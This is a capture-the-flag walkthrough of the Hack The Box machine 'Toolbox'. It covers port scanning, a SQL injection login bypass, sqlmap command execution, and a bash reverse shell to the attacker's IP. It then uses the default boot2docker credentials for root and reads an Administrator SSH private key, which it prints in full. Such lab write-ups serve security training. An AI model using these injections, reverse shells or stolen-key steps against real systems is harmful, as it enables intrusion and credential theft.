# Toolbox
## Reconnaissance: NMAP
```
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.236
21/tcp open ftp FileZilla ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp 242520560 Feb 18 2020 docker-toolbox.exe
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:1a:a1:81:99:ea:f7:96:02:19:2e:6e:97:04:5a:3f (RSA)
| 256 a2:4b:5a:c7:0f:f3:99:a1:3a:ca:7d:54:28:76:b2:dd (ECDSA)
|_ 256 ea:08:96:60:23:e2:f4:4f:8d:05:b3:18:41:35:23:39 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open tcpwrapped
445/tcp open microsoft-ds?
Aggressive OS guesses: Microsoft Windows Server 2019 (96%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 10 1709 - 1909 (93%), Microsoft Windows Server 2012 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows 10 1709 - 1803 (91%), Microsoft Windows 10 1809 - 2004 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-16T02:02:31
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
```
```
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.236
123/udp open|filtered ntp
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
500/udp open|filtered isakmp
4500/udp open|filtered nat-t-ike
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr
Device type: general purpose
Running: Microsoft Windows 10|2008|2012|7|8.1|Longhorn|Vista
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista:::business
```
## Enumeration: HTTPS Port 443/tcp
There’s a certificate on 443 with the domain name admin.megalogistic.com.
Apache/2.4.38 (Debian) Server \
10.10.10.236 Port 443
\
\
view-source: \
Copyright ©document.write(new Date().getFullYear()); All rights reserved | This template is made with by [Colorlib](https://colorlib.com)
The site is for a shipping / logistics company: \
megalogistic.com
Most of the site is just lorem ipsum text (filler), and the forms don’t seem to submit anywhere. I could make a list of potential usernames from about.html, but it’s just names without emails, so I’ll look elsewhere first. All the pages look static at this point.
**Fuzz for VHosts:**
Given the existence of admin.megalogistic.com, I’ll fuzz to see if any other virtual hosts display something different, but didn’t find anything besides admin:
```
┌──(kali💀kali)-[~]
└─$ wfuzz -u https://10.10.10.236 -H "Host: FUZZ.megalogistic.com" -w /usr/share/seclists/SecLists-master/Discovery/DNS/bitquark-subdomains-top100000.txt --hh 22357
Target: https://10.10.10.236/
Total requests: 100000
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000036: 200 35 L 83 W 889 Ch "admin"
000037212: 400 12 L 53 W 424 Ch "*"
```
**admin.megalogistic.com:** \
This page presents a login form:\
\
```
┌──(kali💀kali)-[~/Desktop]
└─$ sudo nano /etc/hosts
10.10.10.236 megalogistic.com
10.10.10.236 admin.megalogistic.com
```
```
┌──(kali💀kali)-[~/Desktop]
└─$ whatweb -a3 https://10.10.10.236/ -v
WhatWeb report for https://10.10.10.236/
Status : 200 OK
Title : MegaLogistics
IP : 10.10.10.236
Country : RESERVED, ZZ
Summary : Apache[2.4.38], Bootstrap[4.1.3], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], JQuery[3.3.1], Script
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.38 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Version : 4.1.3
Version : 4.1.3
Website : https://getbootstrap.com/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.38 (Debian) (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Version : 3.3.1
Website : http://jquery.com/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
HTTP Headers:
HTTP/1.1 200 OK
Date: Tue, 16 Jan 2024 05:35:28 GMT
Server: Apache/2.4.38 (Debian)
Last-Modified: Tue, 18 Feb 2020 06:51:26 GMT
ETag: "5755-59ed419c2b780-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3570
Connection: close
Content-Type: text/html
```
## Enumeration: SMB Port 139/445/tcp
Anonymous access is not permitted to SMB:
```
┌──(kali💀kali)-[~/Desktop]
└─$ smbclient -N -L //10.10.10.236
session setup failed: NT_STATUS_ACCESS_DENIED
```
```
┌──(kali💀kali)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.236 -u '' -p '' --shares
SMB 10.10.10.236 445 TOOLBOX [*] Windows 10.0 Build 17763 x64 (name:TOOLBOX) (domain:Toolbox) (signing:False) (SMBv1:False)
SMB 10.10.10.236 445 TOOLBOX [-] Toolbox\: STATUS_ACCESS_DENIED
SMB 10.10.10.236 445 TOOLBOX [-] Error getting user: list index out of range
SMB 10.10.10.236 445 TOOLBOX [-] Error enumerating shares: Error occurs while reading from remote(104)
```
## Enumeration: FTP Port 21/tcp
As nmap noted, anonymous login is available for FTP. I’ll give it the username anonymous and a blank password:
FileZilla ftpd \
ftp-anon: Anonymous FTP login allowed (FTP code 230)
```
┌──(kali💀kali)-[~]
└─$ cd Desktop
┌──(kali💀kali)-[~/Desktop]
└─$ ftp 10.10.10.236
Connected to 10.10.10.236.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (10.10.10.236:kali): Anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||55712|)
150 Opening data channel for directory listing of "/"
-r-xr-xr-x 1 ftp ftp 242520560 Feb 18 2020 docker-toolbox.exe
226 Successfully transferred "/"
ftp> get docker-toolbox.exe
local: docker-toolbox.exe remote: docker-toolbox.exe
229 Entering Extended Passive Mode (|||51982|)
150 Opening data channel for file download from server of "/docker-toolbox.exe"
100% |****************************************************| 231 MiB 232.26 KiB/s 00:00 ETA
226 Successfully transferred "/docker-toolbox.exe"
242520560 bytes received in 16:59 (232.26 KiB/s)
```
Docker Toolbox is an older solution for running Docker in Windows, before Windows had native Docker support. It basically ran a VirtualBox Linux VM that runs Docker and its containers.
{% embed url="" %}
## Shell as postgres in container
**Identify SQL Injection:** \
If I try to login with password ', the page return the form, with an error message in the background at the top:
```
Warning: pg_query(): Query failed: ERROR: unterminated quoted string at or near "''');" LINE 1: ...FROM users WHERE username = 'admin' AND password = md5('''); ^ in /var/www/admin/index.php on line 10
Warning: pg_num_rows() expects parameter 1 to be resource, bool given in /var/www/admin/index.php on line 11
```
There are multiple things to learn from this:
* The form is likely vulnerable to SQL injection.
* The error is from pg\_query(), which suggests the backend database is PostgreSQL.
* The passwords are stored using MD5 hashes.
**Bypass Login:** \
From the error above, I can guess that the SQL query being run looks like:
```
SELECT * FROM users WHERE username = '{input user}' AND password = md5('{input password}');
```
Then the site likely checks if there are results to determine if access should be allowed. If I submit the username ' or 1=1-- -, then the query will be:
```
SELECT * FROM users WHERE username = '' or 1=1-- -'' AND password = md5('anything');
```
Because -- - makes anything after a comment, this will return all users, and hopefully let me in:
```
' or 1=1-- -
admin
```
I’m at the admin dashboard, but it doesn’t do much: ToDo List
* Send credentials to Tony
* Update Printer Drivers
**Enumerate DB:**\
A login form isn’t displaying data from the DB back to the page, so it’s a more difficult blind injection. For an easy-rated box like Toolbox, I’ll turn to sqlmap. I’ll save a POST request for login from Burp to a file with right-click, “Copy to file”. It’s important that this request not have any injections in it, or sqlmap will yell.
I’ll run with -r login.request to give it the file to work from, --force-ssl (as that’s where the site is), and --batch to accept the defaults at the prompts. It finds four injections:
```
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests:
Parameter: username (POST)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: username=admin' AND (SELECT (CASE WHEN (2512=2512) THEN NULL ELSE CAST((CHR(76)||CHR(111)||CHR(120)||CHR(115)) AS NUMERIC) END)) IS NULL AND 'mAec'='mAec&password=admin
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: username=admin' AND 1420=CAST((CHR(113)||CHR(112)||CHR(107)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (1420=1420) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(106)||CHR(112)||CHR(113)) AS NUMERIC) AND 'nKhs'='nKhs&password=admin
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: username=admin';SELECT PG_SLEEP(5)--&password=admin
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: username=admin' AND 7695=(SELECT 7695 FROM PG_SLEEP(5)) AND 'LVhl'='LVhl&password=admin
```
I’ll add --dbs to the end of the command and run it again to list the dbs:
```
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --dbs
available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public
```
I will list the tables in public, finding one:
```
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch -D public --tables
Database: public
[1 table]
+-------+
| users |
+-------+
```
I will dump a single user, admin, and their password hash. sqlmap tries to crack it but fails, and Google doesn’t know it either.
```
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch -D public -T users --dump
Database: public
Table: users
[1 entry]
+----------------------------------+----------+
| password | username |
+----------------------------------+----------+
| 4a100a85cb5ca3616dcf137918550815 | admin |
+----------------------------------+----------+
```
**Commands via SQL:**\
One technique that rarely works, but is always worth trying is the --os-cmd flag in sqlmap. From the docs, for PostgreSQL, it will upload a shared library to the system that will work with the database and run arbitrary commands on the system.
{% embed url="" %}
I’ll try whoami since it will work on either Linux or Windows, and it works:
```
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --os-cmd whoami
do you want to retrieve the command standard output? [Y/n/a] Y
[01:43:00] [INFO] retrieved: 'postgres'
```
The previous command identified the OS as Debian 10. Given this is a Windows host according to HTB, this must be in a Docker container. The id command returns as well:
```
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --os-cmd id
do you want to retrieve the command standard output? [Y/n/a] Y
[01:45:28] [INFO] retrieved: 'uid=102(postgres) gid=104(postgres) groups=104(postgres),102(ssl...
command standard output: 'uid=102(postgres) gid=104(postgres) groups=104(postgres),102(ssl-cert)'
```
**Shell:**\
The --os-shell flag will drop into an interactive prompt to run more than one command as well:
```
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --os-shell
[01:47:57] [INFO] retrieved: 'postgres'
command standard output: 'postgres'
os-shell>
```
I’ll start nc and give sqlmap a Bash reverse shell to see if it works:
```
┌──(kali💀kali)-[~]
└─$ nc -lnvp 443
os-shell> bash -c "bash -i >& /dev/tcp/10.10.16.4/443 0>&1"
```
Legacy Python is not installed, but Python3 is:
```
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python -V
python -V
bash: python: command not found
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python3 -V
python3 -V
Python 3.7.3
```
I’ll upgrade my shell using the standard trick:
```
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python3 -c 'import pty;pty.spawn("bash")'
```
This is important as I can’t do the next steps without a full TTY. There’s also a user.txt in postgres’ home directory (not sure why it says flag.txt in the file, but the hash works):
```
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ cd ~
postgres@bc56e3cc55e9:/var/lib/postgresql$ ls
11 user.txt
postgres@bc56e3cc55e9:/var/lib/postgresql$ cat user.txt
f0183e44378ea9---------------- flag.txt
```
## Shell as docker/root in VM
**Enumeration:** \
I’m definitely not on the host machine now. ifconfig shows the IP 172.17.0.2:
```
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ifconfig
eth0: flags=4163 mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 721124 bytes 51846855 (49.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 306291 bytes 1641368970 (1.5 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 13736 bytes 4744312 (4.5 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 13736 bytes 4744312 (4.5 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
```
The file system is quite empty.
**Docker-Toolbox:**\
At this point, a bit more detail about Docker-Toolbox is necessary. The solution is deprecated, but that doesn’t mean it can’t be seen in the wild. Docker Toolbox installs VirtualBox, and creates a VM running the boot2docker Linux distribution. From it’s README:
{% embed url="" %}
Boot2Docker is a lightweight Linux distribution made specifically to run Docker containers. It runs completely from RAM, is a \~45MB download and boots quickly.
**sudo:**
```
┌──(kali💀kali)-[~]
└─$ nc -lnvp 5555
listening on [any] 5555 ...
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ssh docker@172.17.0.1
ssh docker@172.17.0.1
Pseudo-terminal will not be allocated because stdin is not a terminal.
Permission denied, please try again.
Permission denied, please try again.
docker@172.17.0.1: Permission denied (publickey,password,keyboard-interactive).
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ sudo ssh docker@172.17.0.1
sudo ssh docker@172.17.0.1
bash: sudo: command not found
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python3 -c 'import pty;pty.spawn("bash")'
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ssh docker@172.17.0.1
docker@172.17.0.1's password: tcuser
( '>')
/) TC (\ Core is distributed with ABSOLUTELY NO WARRANTY.
(/-_--_-\) www.tinycorelinux.net
docker@box:~$ sudo -l
User docker may run the following commands on this host:
(root) NOPASSWD: ALL
docker@box:~$ sudo su
root@box:/home/docker#
```
## Shell as root
**Enumeration:** \
There’s nothing interesting in any of the homedirs on this VM. This is, as I suspected, boot2docker:
```
root@box:/home/docker# cat /etc/os-release
cat /etc/os-release
NAME=Boot2Docker
VERSION=19.03.5
ID=boot2docker
ID_LIKE=tcl
VERSION_ID=19.03.5
PRETTY_NAME="Boot2Docker 19.03.5 (TCL 10.1)"
ANSI_COLOR="1;34"
HOME_URL="https://github.com/boot2docker/boot2docker"
SUPPORT_URL="https://blog.docker.com/2016/11/introducing-docker-community-directory-docker-community-slack/"
BUG_REPORT_URL="https://github.com/boot2docker/boot2docker/issues"
```
There’s an interesting folder at the system root, c:
```
root@box:/# ls
ls
bin home linuxrc root sys
c init mnt run tmp
dev lib opt sbin usr
etc lib64 proc squashfs.tgz var
root@box:/# cd c
root@box:/c# ls
Users
```
It looks like it has mounted the Users directory, which is standard in a Windows system:
```
root@box:/c# cd Users/
root@box:/c/Users# ls
Administrator Default Public desktop.ini
All Users Default User Tony
```
In the Administrator’s folder, in addition to a bunch of typical Windows stuff, there’s a .ssh directory:
```
root@box:/c/Users# cd Administrator
root@box:/c/Users/Administrator# ls -la
total 1481
drwxrwxrwx 1 docker staff 8192 Feb 8 2021 .
dr-xr-xr-x 1 docker staff 4096 Feb 19 2020 ..
drwxrwxrwx 1 docker staff 4096 Jan 16 01:59 .VirtualBox
drwxrwxrwx 1 docker staff 0 Feb 18 2020 .docker
drwxrwxrwx 1 docker staff 0 Feb 19 2020 .ssh
dr-xr-xr-x 1 docker staff 0 Feb 18 2020 3D Objects
drwxrwxrwx 1 docker staff 0 Feb 18 2020 AppData
drwxrwxrwx 1 docker staff 0 Feb 19 2020 Application Data
dr-xr-xr-x 1 docker staff 0 Feb 18 2020 Contacts
drwxrwxrwx 1 docker staff 0 Sep 15 2018 Cookies
dr-xr-xr-x 1 docker staff 0 Feb 8 2021 Desktop
dr-xr-xr-x 1 docker staff 4096 Feb 19 2020 Documents
dr-xr-xr-x 1 docker staff 0 Apr 5 2021 Downloads
dr-xr-xr-x 1 docker staff 0 Feb 18 2020 Favorites
dr-xr-xr-x 1 docker staff 0 Feb 18 2020 Links
drwxrwxrwx 1 docker staff 4096 Feb 18 2020 Local Settings
dr-xr-xr-x 1 docker staff 0 Feb 18 2020 Music
dr-xr-xr-x 1 docker staff 4096 Feb 19 2020 My Documents
-rwxrwxrwx 1 docker staff 262144 Jan 11 2022 NTUSER.DAT
-rwxrwxrwx 1 docker staff 65536 Feb 18 2020 NTUSER.DAT{1651d10a-52b3-11ea-b3e9-000c29d8029c}.TM.blf
-rwxrwxrwx 1 docker staff 524288 Feb 18 2020 NTUSER.DAT{1651d10a-52b3-11ea-b3e9-000c29d8029c}.TMContainer00000000000000000001.regtrans-ms
-rwxrwxrwx 1 docker staff 524288 Feb 18 2020 NTUSER.DAT{1651d10a-52b3-11ea-b3e9-000c29d8029c}.TMContainer00000000000000000002.regtrans-ms
drwxrwxrwx 1 docker staff 0 Sep 15 2018 NetHood
dr-xr-xr-x 1 docker staff 0 Feb 18 2020 Pictures
dr-xr-xr-x 1 docker staff 0 Feb 18 2020 Recent
dr-xr-xr-x 1 docker staff 0 Feb 18 2020 Saved Games
dr-xr-xr-x 1 docker staff 0 Feb 18 2020 Searches
dr-xr-xr-x 1 docker staff 0 Sep 15 2018 SendTo
dr-xr-xr-x 1 docker staff 0 Feb 18 2020 Start Menu
drwxrwxrwx 1 docker staff 0 Sep 15 2018 Templates
dr-xr-xr-x 1 docker staff 0 Feb 18 2020 Videos
-rwxrwxrwx 1 docker staff 12288 Feb 18 2020 ntuser.dat.LOG1
-rwxrwxrwx 1 docker staff 98304 Feb 18 2020 ntuser.dat.LOG2
-rwxrwxrwx 1 docker staff 20 Feb 18 2020 ntuser.ini
```
While this is typically thought of as a Linux thing, Windows with SSH can have this as well to allow for key-based auth and other standard SSH needs. There is a key inside:
```
root@box:/c/Users/Administrator# cd .ssh
root@box:/c/Users/Administrator/.ssh# ls
authorized_keys id_rsa id_rsa.pub known_hosts
```
The public key here is in authorized\_keys, as this returns nothing:
```
root@box:/c/Users/Administrator/.ssh# diff id_rsa.pub authorized_keys
diff id_rsa.pub authorized_keys
```
ssh-keygen -y -e -f keyfile will return the public key for the key, so I can use that to check if the private key here matches the public (and the one in authorized\_key):
```
root@box:/c/Users/Administrator/.ssh# ssh-keygen -y -e -f id_rsa
ssh-keygen -y -e -f id_rsa
---- BEGIN SSH2 PUBLIC KEY ----
Comment: "2048-bit RSA, converted by root@box from OpenSSH"
AAAAB3NzaC1yc2EAAAADAQABAAABAQC+jhIuWD92RK0DiMNQ3GAXyRs0AX7ohgs044J6ml
+PPpFI5C8x3TxpsbKeEozOyKJUJ4miP0vwZ9JcZkh+wAhZef2fI1oN0CmgXsx+bUoi2A75
b2YzuUCuzjOAHMwZCV4iyRC9ZNwqtA10IOP0nE0huFguEleCuj67l1boRxjOrYxI5GbsD5
5d+Y+92viETTA1QjDHag4+vZ24F+bG6EvyZlBa7lTX4il7Y2/h8BRiEoZNYePihyNTAb1d
xTSIjilwdPedc8qYaOg/KI/OlrlZ2InxCkwTf3w2d7iafE5uhZOneMZonUa6dkLKJzSJLB
6ZwEmI3J9kKFOKlaYEwrzz
---- END SSH2 PUBLIC KEY ----
root@box:/c/Users/Administrator/.ssh# ssh-keygen -y -e -f id_rsa.pub
ssh-keygen -y -e -f id_rsa.pub
---- BEGIN SSH2 PUBLIC KEY ----
Comment: "2048-bit RSA, converted by root@box from OpenSSH"
AAAAB3NzaC1yc2EAAAADAQABAAABAQC+jhIuWD92RK0DiMNQ3GAXyRs0AX7ohgs044J6ml
+PPpFI5C8x3TxpsbKeEozOyKJUJ4miP0vwZ9JcZkh+wAhZef2fI1oN0CmgXsx+bUoi2A75
b2YzuUCuzjOAHMwZCV4iyRC9ZNwqtA10IOP0nE0huFguEleCuj67l1boRxjOrYxI5GbsD5
5d+Y+92viETTA1QjDHag4+vZ24F+bG6EvyZlBa7lTX4il7Y2/h8BRiEoZNYePihyNTAb1d
xTSIjilwdPedc8qYaOg/KI/OlrlZ2InxCkwTf3w2d7iafE5uhZOneMZonUa6dkLKJzSJLB
6ZwEmI3J9kKFOKlaYEwrzz
---- END SSH2 PUBLIC KEY ----
```
They match!
**SSH:**\
I’ll create a copy of the private key on my local VM, and set the permissions so that SSH will trust it:
```
root@box:/c/Users/Administrator/.ssh# cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAvo4SLlg/dkStA4jDUNxgF8kbNAF+6IYLNOOCeppfjz6RSOQv
Md08abGynhKMzsiiVCeJoj9L8GfSXGZIfsAIWXn9nyNaDdApoF7Mfm1KItgO+W9m
M7lArs4zgBzMGQleIskQvWTcKrQNdCDj9JxNIbhYLhJXgro+u5dW6EcYzq2MSORm
7A+eXfmPvdr4hE0wNUIwx2oOPr2duBfmxuhL8mZQWu5U1+Ipe2Nv4fAUYhKGTWHj
4ocjUwG9XcU0iI4pcHT3nXPKmGjoPyiPzpa5WdiJ8QpME398Nne4mnxOboWTp3jG
aJ1GunZCyic0iSwemcBJiNyfZChTipWmBMK88wIDAQABAoIBAH7PEuBOj+UHrM+G
Stxb24LYrUa9nBPnaDvJD4LBishLzelhGNspLFP2EjTJiXTu5b/1E82qK8IPhVlC
JApdhvDsktA9eWdp2NnFXHbiCg0IFWb/MFdJd/ccd/9Qqq4aos+pWH+BSFcOvUlD
vg+BmH7RK7V1NVFk2eyCuS4YajTW+VEwD3uBAl5ErXuKa2VP6HMKPDLPvOGgBf9c
l0l2v75cGjiK02xVu3aFyKf3d7t/GJBgu4zekPKVsiuSA+22ZVcTi653Tum1WUqG
MjuYDIaKmIt9QTn81H5jAQG6CMLlB1LZGoOJuuLhtZ4qW9fU36HpuAzUbG0E/Fq9
jLgX0aECgYEA4if4borc0Y6xFJxuPbwGZeovUExwYzlDvNDF4/Vbqnb/Zm7rTW/m
YPYgEx/p15rBh0pmxkUUybyVjkqHQFKRgu5FSb9IVGKtzNCtfyxDgsOm8DBUvFvo
qgieIC1S7sj78CYw1stPNWS9lclTbbMyqQVjLUvOAULm03ew3KtkURECgYEA17Nr
Ejcb6JWBnoGyL/yEG44h3fHAUOHpVjEeNkXiBIdQEKcroW9WZY9YlKVU/pIPhJ+S
7s++kIu014H+E2SV3qgHknqwNIzTWXbmqnclI/DSqWs19BJlD0/YUcFnpkFG08Xu
iWNSUKGb0R7zhUTZ136+Pn9TEGUXQMmBCEOJLcMCgYBj9bTJ71iwyzgb2xSi9sOB
MmRdQpv+T2ZQQ5rkKiOtEdHLTcV1Qbt7Ke59ZYKvSHi3urv4cLpCfLdB4FEtrhEg
5P39Ha3zlnYpbCbzafYhCydzTHl3k8wfs5VotX/NiUpKGCdIGS7Wc8OUPBtDBoyi
xn3SnIneZtqtp16l+p9pcQKBgAg1Xbe9vSQmvF4J1XwaAfUCfatyjb0GO9j52Yp7
MlS1yYg4tGJaWFFZGSfe+tMNP+XuJKtN4JSjnGgvHDoks8dbYZ5jaN03Frvq2HBY
RGOPwJSN7emx4YKpqTPDRmx/Q3C/sYos628CF2nn4aCKtDeNLTQ3qDORhUcD5BMq
bsf9AoGBAIWYKT0wMlOWForD39SEN3hqP3hkGeAmbIdZXFnUzRioKb4KZ42sVy5B
q3CKhoCDk8N+97jYJhPXdIWqtJPoOfPj6BtjxQEBoacW923tOblPeYkI9biVUyIp
BYxKDs3rNUsW1UUHAvBh0OYs+v/X+Z/2KVLLeClznDJWh/PNqF5I
-----END RSA PRIVATE KEY-----
┌──(kali💀kali)-[~/Desktop]
└─$ nano key
┌──(kali💀kali)-[~/Desktop]
└─$ chmod 600 key
```
```
┌──(kali💀kali)-[~/Desktop]
└─$ ssh -i key administrator@10.10.10.236
The authenticity of host '10.10.10.236 (10.10.10.236)' can't be established.
ED25519 key fingerprint is SHA256:KJAib23keV2B8xvFaxg7e79uztryW+LYX+Wb2qA9u4k.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.236' (ED25519) to the list of known hosts.
Microsoft Windows [Version 10.0.17763.1039]
(c) 2018 Microsoft Corporation. All rights reserved.
administrator@TOOLBOX C:\Users\Administrator>whoami
toolbox\administrator
administrator@TOOLBOX C:\Users\Administrator>cd Desktop
administrator@TOOLBOX C:\Users\Administrator\Desktop>type root.txt
cc9a0b76ac17-----------------------
```